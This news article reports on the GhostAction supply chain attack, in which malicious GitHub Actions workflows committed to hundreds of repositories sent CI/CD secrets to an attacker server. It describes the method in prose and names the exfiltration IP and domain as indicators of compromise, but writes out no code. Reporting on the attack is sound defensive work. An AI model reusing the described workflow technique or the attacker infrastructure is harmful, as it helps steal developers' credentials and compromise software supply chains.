GhostAction Attack Steals 3,325 Secrets from GitHub Projects

On September 2, 2025, a GitHub user known as Grommash9 committed a new workflow file to the FastUUID project. The file, labelled “Github Actions Security,” appeared similar to routine automation scripts but was later found to contain malicious code designed to collect CI/CD secrets and send them to an external server.

FastUUID is an open-source Python library used in generating and working with universally unique identifiers (UUIDs) efficiently.

By September 5, cybersecurity researchers at GitGuardian had spotted the unusual activity and confirmed the FastUUID repository had been compromised. The workflow contained a command that packaged secrets into an HTTP POST request and transmitted them to a server hosted at 45.139.104.115.

The PyPI token for the project was among the data exfiltrated, but investigators found no malicious package releases during the compromise period. PyPI acted in time, locking the project in read-only mode to prevent further abuse while the maintainer removed the malicious commit.

GitGuardian’s follow-up analysis revealed that hundreds of repositories had been tampered with using nearly identical workflows. The company has now dubbed the attack “GhostAction” supply chain attack.

According to GitGuardian’s report shared with Hackraed.com, in total, 327 developers across 817 repositories were affected, and attackers stole over 3,325 secrets. These included DockerHub credentials and GitHub tokens to npm publishing keys, which could be misused or impact software supply chains.

The attack also included attackers analysing legitimate workflow files to identify which secrets were in use, then hardcoded those same secret names into their malicious workflows.

Furthermore, each commit was personalised, adjusting the attack to each project. The exfiltration server remained consistent throughout the campaign, always pointing to a domain “plesk.page” which stopped resolving later in the afternoon of September 5.

GitGuardian’s team raised issues directly in hundreds of compromised repositories to notify developers. They were able to alert maintainers of 573 projects, while others had either disabled GitHub issues or deleted the repository entirely. Conversations with affected developers also confirmed that some secrets were actively abused, with attackers attempting to access AWS environments and database services.

The incident affected projects in multiple programming languages, with malicious workflow commits found in Python, JavaScript, Rust, and Go repositories. Additionally, several companies found that their entire SDK portfolios had been tampered with. Since the attackers compromised many projects, the stolen npm and PyPI tokens could still be used to publish malicious releases.

By late afternoon on September 5, GitGuardian had notified GitHub, npm, and PyPI of the campaign. Security teams across these platforms are now monitoring for suspicious package publications and related activity. So far, at least 9 npm and 15 PyPI projects remain at risk due to compromised tokens, though no malicious releases have yet been confirmed.

GitGuardian has published indicators of compromise, including the workflow file name, commit message, and the malicious server address, to help teams identify whether their projects were affected.

The GhostAction campaign is still under investigation, but current findings show it to be one of the largest GitHub workflow compromises to date, affecting hundreds of projects and exposing thousands of secrets.